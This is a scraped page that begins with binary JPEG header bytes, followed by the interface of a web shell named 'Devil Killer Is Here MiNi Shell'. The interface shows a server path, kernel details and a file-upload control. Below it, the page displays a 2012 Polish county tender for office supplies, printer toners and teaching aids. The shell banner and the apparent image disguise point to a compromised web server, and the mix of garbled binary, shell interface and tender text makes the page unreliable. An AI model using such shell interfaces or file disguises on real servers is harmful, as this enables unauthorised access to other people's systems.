JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/329002-N-2012.html

<p class="kh_header"><b>Żnin: Przedmiotem zamówienia jest dostawa  materiałów  biurowych,  tuszy, tonerów  oraz pomocy dydaktycznych  na potrzeby projektu  Autostrada kompetencji i umiejętności  realizowanego   w ramach priorytetu IX. Rozwój wykształcenia i kompetencji w regionach Programu Operacyjnego Kapitał Ludzki, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego</b><br>
<b>Numer ogłoszenia: 329002 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Żninie , ul. Potockiego 1, 88-400 Żnin, woj. kujawsko-pomorskie, tel. 052 3031100, faks 052 3031302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.znin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa  materiałów  biurowych,  tuszy, tonerów  oraz pomocy dydaktycznych  na potrzeby projektu  Autostrada kompetencji i umiejętności  realizowanego   w ramach priorytetu IX. Rozwój wykształcenia i kompetencji w regionach Programu Operacyjnego Kapitał Ludzki, Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I ARTYKUŁY  BIUROWE

Lp. Nazwa Asortymentu          Jednostka Maksymalna szacunkowa ilość zamówienia
1. Papier ksero Format A4, biały, Ryza = 500arkuszy, gramatura : 80g-m2, 
    klasa papieru A	                   Ryza	   300 
2. Koszulki na dokumenty format A4, przeźroczyste, 100szt w opakowaniu opakowanie   144 
3. Skoroszyt plastikowy z zawieszką format A4, wykonany z folii PP, przezroczysta przednia okładka, kolorowa tylna, na grzbiecie wymienny papierowy pasek do opisu, standardowa perforacja na grzbiecie do wpięcia w segregator	sztuka	1200 
4. Papier ozdobny 20sz-ryzie, A4,  kolor biały, gramatura 240g/m2 ryza  20 
5. Segregator A4 szerokość co najmniej 70mm, oprawa twarda, mechanizm dźwigniowy, wszystkie sztuki w jednakowym kolorze sztuka 112 
6. Teczka z gumką wykonana z grubego, barwionego i lakierowanego z jednej strony kartonu, zamykana gumką; trzy zakładki chroniące dokument przed wypadnięciem , na dokumenty formatu A4. sztuka	80 
7. Dziurkacz Metalowy, jednorazowo dziurkuje do 35 kartek papieru o gramaturze 80 g/m2, z ogranicznikiem sztuka	10 
8. Zszywacz zszywający co najmniej 25 kartek jednorazowo sztuka 10 
9. Zszywki Wielkość  24-6, min. 1000 szt-opakowanie opakowanie	50 
10. Spinacze Metalowe spinacze okrągłe o długości 50 mm, opakowanie - co najmniej 100 szt. 	opakowanie 50 
11. Bloczek samoprzylepny 75x75mm kolor, co najmniej 100 kartek w bloczku	
sztuka 56 
12. Bloczki indeksów samoprzylepnych do dokumentów znaczniki  w min. 4 kolorach, w bloczkach min. 100-kartkowych, 	komplet	40 
13. Koperta biała B4 samoprzylepna	sztuka	625 
14. Płyta CD-R  700MB, x 52 	sztuka	160 
15. Płyta DVD-R, 4,7GB, x16 	sztuka	40 
16. Pióro żelowe wkład żelowy niebieski, tusz wodoodporny, mechanizm chowania wkładu	sztuka	80 

CZĘŚĆ II TUSZE I TONERY

Lp.	Nazwa drukarki i kopiarki	Nazwa i symbol materiału eksploatacyjnego (oryginał)	Jednostka	Maksymalna szacunkowa ilość zamówienia
1. DRUKARKA HP PSC 1315 	HP 57 KOLOR	sztuka	2
		             HP 56  czarny	sztuka	2

2. DRUKARKA HP 845C          HP 15 CZARNY	sztuka	4
		              HP 17 KOLOR	sztuka	4
3. DRUKARKA HP OFFICEJET PRO  8600 HP 950 XL czarny	sztuka	3
		                           HP 951 XL niebieski	sztuka	2
		                           HP 951 XL czerwony	sztuka	2
		                           HP 951 XL żółty	sztuka	2
4. HP LASERJET P2015	              HP 53A  Q7553A CZARNY	sztuka	8
5. HP LASERJET 1010	              HP 12A CZARNY	sztuka	4
6. KOPIARKA-DRUKARKA CANON IR 2018 C-EXV 14 toner czarny	sztuka	8
7. DRUKARKA BROTHER MFC - 7320 BROTHER MFC - 7320- CZARNY sztuka	4
8. KOPIARKA UTAX CD 1216	UTAX CD 1216 CZARNY	sztuka	4
9. DRUKARKA EPSON B-510DN	CZARNY - T6171	sztuka	3
		                          CZERWONY - T6173	sztuka	2
		                           NIEBIESKI - T6172	sztuka	2
		                           ŻÓŁTY - T6174	sztuka	2
10. KOPIARKA MINOLTA EP 1054 104B CZARNY opakowanie 2 szt.	sztuka	4
11. DRUKARKA SAMSUNG ML 1640 S-ML1640-2240 czarny	             sztuka	4
12. DRUKARKA  SAMSUNG ML-1710P	ML-1710D3 czarny	             sztuka	4
13. DRUKARKA  SAMSUNG ML-2251N 	SAMSUNG  ML-2250D5 CZARNY sztuka	4
14. DRUKARKA  SAMSUNG ML-1660	SAMSUNG MLT-D1042S CZARNYsztuka	4
15. KOPIARKA KYOCERA MITA - 1635	TK 410KM  czarny	                sztuka	4
16.KOPIARKA KYOCERA MITA 1620-1635-2020-2050 TKC 410K TK-410 KM-1620 sztuka	4
17. KOPIARKA KYOCERA MITA TA 2023 Vi 230-310 CZARNY	sztuka	4
18. KYOCERA FS 1010	KYOCERA FS 1010 CZARNY	             sztuka	4
Zamawiający wymaga materiałów eksploatacyjnych fabrycznie nowych, nieużywanych i oryginalnie wyprodukowanych przez producenta urządzeń wskazanych powyżej lub równoważnych. Za równoważne uznaje się produkty nieregenerowane w ogóle, niepoddane procesowi ponownego napełniania ani wymiany jakichkolwiek elementów, kompatybilne
z urządzeniami, w których będą wykorzystywane i niepowodujące uszkodzeń ani zaburzeń  w pracy urządzeń, do których są przeznaczone. Równoważne materiały muszą mieć wydajność co najmniej taką, jak oryginalne.
Materiały równoważne muszą działać analogicznie, jak materiały oryginalne producenta urządzeń i posiadać elementy elektroniczne dające komunikaty przy pracy w sieci.
Opakowanie:
1. Opakowania, w których dostarczone zostaną materiały, muszą posiadać czytelną nazwę   producenta i listę kompatybilności ( typ drukarek, urządzeń wielofunkcyjnych, do których   są przystosowane).
2. Opakowanie zbiorcze, w których wykonawca dostarczy materiały, muszą zostać  oznaczone nazwą (firmą) i pełnym adresem Wykonawcy.
Warunki gwarancji: 
1.Okres gwarancji na dostarczone materiały eksploatacyjne liczy się od daty odbioru produktu bez zastrzeżeń i trwa do momentu wyczerpania się środka drukującego,
2. W przypadku ujawnienia w okresie gwarancji wad materiałów eksploatacyjnych,     Wykonawca zobowiązany będzie do bezpłatnej ich wymiany na nowe, wolne  o wad, niezwłocznie od momentu zgłoszenia przez Zamawiającego drogą  telefoniczną, faksem lub pisemnie,
3. Wykonawca zobowiązany będzie dostarczyć nowe materiały eksploatacyjne, wolne  od wad, do siedziby Zamawiającego, na własny koszt,
4. W przypadku wymiany materiałów eksploatacyjnych na nowe, wolne od wad, okres   gwarancji biegnie od daty ich odbioru. 
5.  W przypadku dostarczenia przez Wykonawcę materiałów eksploatacyjnych   równoważnych,   Wykonawca gwarantuje:
1)zwrot kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie
   zastosowanie dostarczonego materiału eksploatacyjnego,
2)bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii
   będzie zastosowanie dostarczonych materiałów eksploatacyjnych, a naprawa 
   nie przywróci jego pełnej użyteczności,
3)w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych materiałów
   eksploatacyjnych utraci gwarancję producenta urządzeń, Wykonawca przejmie
   wszelkie obowiązki gwarancyjne dotyczące urządzeń.

CZĘŚĆ  III POMOCE  DYDAKTYCZNE
Lp.	Nazwa Asortymentu	Jednostka	Maksymalna szacunkowa ilość zamówienia

1. Przybory geometryczne do tablicy szkolnej, w tym:- cyrkiel na przyssawce lub szpikulcu 	sztuk	8 
2. - ekierka tablicowa z uchwytem, magnetyczna, co najmniej 50cm sztuk	8
3- kątomierz tablicowy z uchwytem, magnetyczny, co najmniej 50cm sztuk	8 
4. - linijka tablicowa z uchwytem, magnetyczna, co najmniej 100cm sztuk	8 
5.ZESTAW BRYŁ GEOMETRYCZNYCH Komplet składający się z co najmniej 10 brył z ,siatkami do rozkładania. wysokość brył: co najmniej 10 cm, tworzywo sztuczne
stożek, walec, sześcian, prostopadłościan, graniastosłupy, ostrosłupy itp. 
komplet	8 
3. Nazwy własne artykułów zostały użyte w opisie przedmiotu zamówienia ze względu na specyfikę tych produktów, ponieważ Zamawiający nie mógł opisać ich za pomocą dostatecznie dokładnych określeń.
4. Zamawiający dopuszcza oferowanie artykułów równoważnych o parametrach nie gorszych od parametrów artykułów  podanych w wykazie.
5. Wykonawca, który powołuje się na rozwiązania równorzędne opisane w niniejszej ofercie obowiązany jest wykazać, że oferowany przez niego towar spełnia wymagania określone przez Zamawiającego.
6. Wykonawca zobowiązany będzie dostarczyć przedmiot zamówienia w terminie do 28  września 2012r. do siedziby Starostwa Powiatowego w Żninie własnym transportem wraz z rozładunkiem i wniesieniem do pomieszczeń wskazanych przez Zamawiającego, na własny koszt, bez obciążania z tego tytułu Zamawiającego dodatkowymi kosztami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.12.51.10-5, 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od wykonawcy wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>określa projekt umowy załączony do specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.znin,pl  w katalogu ZAMÓWIENIA PUBLICZNE.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żninie,  ul. Potockiego 1 biuro nr 12 I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2012 godzina 09:00, miejsce: W siedzibie Zamawiającego Starostwo Powiatowe w Żninie ul. Potockiego 1 Sekretariat Starosty Żnińskiego - pokój nr 19 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany  ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  Działania 9.2. Podniesienie atrakcyjności i jakości szkolnictwa zawodowego,  WND-POKL.09.02.00-04-003-11..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY BIUROWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I ARTYKUŁY  BIUROWE
Lp.	Nazwa Asortymentu	Jednostka	Maksymalna szacunkowa ilość zamówienia
1. Papier ksero Format A4, biały, Ryza = 500arkuszy, gramatura : 80g/m2, klasa papieru A	 Ryza	300 
2. Koszulki na dokumenty format A4, przeźroczyste, 100szt w opakowaniuopakowanie 144 
3. Skoroszyt plastikowy z zawieszką
format A4, wykonany z folii PP, przezroczysta przednia okładka, kolorowa tylna, na grzbiecie wymienny papierowy pasek do opisu, standardowa perforacja na grzbiecie do wpięcia w segregator	sztuka	1200 
4. Papier ozdobny 20sz-ryzie, A4,  kolor biały, gramatura 240g-m2  	
ryza	20 
5. Segregator A4 szerokość co najmniej 70mm, oprawa twarda, mechanizm dźwigniowy, wszystkie sztuki w jednakowym kolorze sztuka 112 
6. Teczka z gumką
wykonana z grubego, barwionego i lakierowanego z jednej strony kartonu, zamykana gumką;  trzy zakładki chroniące dokument przed wypadnięciem , na dokumenty formatu A4.	sztuka	80 
7. Dziurkacz Metalowy, jednorazowo dziurkuje do 35 kartek papieru o gramaturze 80 g/m2, z ogranicznikiem 	sztuka	10 
8. Zszywacz zszywający co najmniej 25 kartek jednorazowo sztuka	10 
9. Zszywki Wielkość  24-6, min. 1000 szt-opakowanie	opakowanie	50 
10. Spinacze Metalowe spinacze okrągłe o długości 50 mm, opakowanie - co najmniej 100 szt. 	opakowanie 50 
11. Bloczek samoprzylepny 75x75mm kolor, co najmniej 100 kartek w bloczku	
sztuka	56 
12. Bloczki indeksów samoprzylepnych do dokumentów 
znaczniki  w min. 4 kolorach, w bloczkach min. 100-kartkowych, komplet
40 
13. Koperta biała B4 samoprzylepna 	sztuka	625 
14. Płyta CD-R  700MB, x 52 	sztuka	160 
15. Płyta DVD-R, 4,7GB, x16  	sztuka	40 
16. Pióro żelowe wkład żelowy niebieski, tusz wodoodporny, mechanizm chowania wkładu	sztuka	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> TUSZE I TONERY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II TUSZE I TONERY

Lp.	Nazwa drukarki i kopiarki	Nazwa i symbol materiału eksploatacyjnego (oryginał)	Jednostka	Maksymalna szacunkowa ilość zamówienia
1. DRUKARKA HP PSC 1315 	HP 57 KOLOR	sztuka	2
		             HP 56  czarny	sztuka	2

2. DRUKARKA HP 845C	HP 15 CZARNY	sztuka	4
		             HP 17 KOLOR	sztuka	4
3.DRUKARKA HP OFFICEJET PRO  8600	HP 950 XL czarny	sztuka	3
		HP 951 XL niebieski	sztuka	2
		HP 951 XL czerwony	sztuka	2
		HP 951 XL żółty	              sztuka	2
4. HP LASERJET P2015 HP 53A  Q7553A CZARNY sztuka	8
5. HP LASERJET 1010 HP 12A CZARNY	              sztuka	4
6. KOPIARKA/DRUKARKA CANON IR 2018 C-EXV 14 toner czarny	sztuka	8
7. DRUKARKA BROTHER MFC - 7320	BROTHER MFC - 7320- CZARNY ztuka	4
8. KOPIARKA UTAX CD 1216	UTAX CD 1216 CZARNY	sztuka	4
9. DRUKARKA EPSON B-510DN	CZARNY - T6171	sztuka	3
		CZERWONY - T6173	sztuka	2
		NIEBIESKI - T6172	sztuka	2
		ŻÓŁTY - T6174	sztuka	2
10. KOPIARKA MINOLTA EP 1054	104B CZARNY opakowanie 2 szt.
sztuka	4
11. DRUKARKA SAMSUNG ML 1640	S-ML1640/2240 czarny	sztuka	4
12. DRUKARKA  SAMSUNG ML-1710P	ML-1710D3 czarny	sztuka	4
13. DRUKARKA  SAMSUNG ML-2251N 	SAMSUNG  ML-2250D5 CZARNYsztuka	4
14. DRUKARKA  SAMSUNG ML-1660	SAMSUNG MLT-D1042S CZARNYsztuka	4
15. KOPIARKA KYOCERA MITA - 1635	TK 410KM  czarny	sztuka	4

16. KOPIARKA KYOCERA MITA 1620/1635/2020/2050 TKC 410K	TK-410 KM-1620sztuka	4
17. KOPIARKA KYOCERA MITA TA 2023 Vi 230/310 CZARNY	sztuka	4
18. KYOCERA FS 1010	KYOCERA FS 1010 CZARNY	sztuka	4
Zamawiający wymaga materiałów eksploatacyjnych fabrycznie nowych, nieużywanych  i oryginalnie wyprodukowanych przez producenta urządzeń wskazanych powyżej lub równoważnych. Za równoważne uznaje się produkty nieregenerowane w ogóle, niepoddane procesowi ponownego napełniania ani wymiany jakichkolwiek elementów, kompatybilne
z urządzeniami, w których będą wykorzystywane i niepowodujące uszkodzeń ani zaburzeń  w pracy urządzeń, do których są przeznaczone. Równoważne materiały muszą mieć wydajność co najmniej taką, jak oryginalne.
Materiały równoważne muszą działać analogicznie, jak materiały oryginalne producenta urządzeń i posiadać elementy elektroniczne dające komunikaty przy pracy w sieci.
Opakowanie:
1. Opakowania, w których dostarczone zostaną materiały, muszą posiadać czytelną nazwę  producenta i listę kompatybilności ( typ drukarek, urządzeń wielofunkcyjnych, do których są przystosowane).
